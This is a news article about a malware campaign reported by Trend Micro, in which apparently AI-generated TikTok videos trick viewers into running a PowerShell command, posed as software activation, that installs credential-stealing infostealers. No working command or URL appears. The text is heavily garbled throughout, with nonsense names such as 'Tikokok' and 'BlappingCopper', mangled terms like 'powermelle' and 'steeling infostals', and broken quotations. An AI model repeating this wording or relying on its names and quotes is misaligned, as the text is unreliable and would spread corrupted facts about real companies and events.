- Trend Micro witnessed a new malware campaign on Tikokok
- Video shows how to activate “premium” features in various software
- The clips were AI-Janit and the victims were tied to download infostealers
Hackers are posting an AI-related video on Ticketkok so that the cyber security researcher Trend Micro warned users to trick the infotable malware.
The base is simple: Attackers use AI to generate several videos, which show how to easily “activate Windows and Microsoft Office”, or to enable “premium features” in apps such as Spotify or Capcut.
They then share these videos on Tikokok, whose algorithm is more likely to make the video viral, which makes the success of the attack more likely.
A new spin on old tricks
In the clip, a person is shown bringing the run program on Windows, and then a Powershell command is executed.
While the video results in the activation of the command special features, in fact, the command users will download a malicious script, which in turn deploys the video and steeling infostals.
These infostealers can take screenshots, steal login credentials, credit cards, exfiltrate cookies, cryptocurrency wallet information, 2FA code, and more.
“This attack uses videos (possibly AI-birthted) to instruct users to execute the powermelle command, which are disguised as software activation stages. Elgorithm access of the tickek increases the possibility of widespread performance, a video with a video is viewed more than half a million,” Trend Micro said.
Researchers said, “The videos are extremely similar, only the slight difference in camera angles and the download URL used by the payload, to bring the payload,” the researchers said.
“These suggests that the video was created through automation. The directive voice also appears to be an AI-generated, strengthening the possibility that the AI tool is being used to produce these videos.”
One of the video has around 500,000 views, more than 20,000 likes, and more than 100 comments, which makes it quite successful.
The video was being used to give malware in the past, but this new campaign is an important departure in earlier ways.
The difference is that earlier, the link to the malware was shared in the video details, or comments, where it can still be picked up by security solutions. By distributing fodder in a video format, the attackers successfully bypass almost all security measures.
Through BlappingCopper
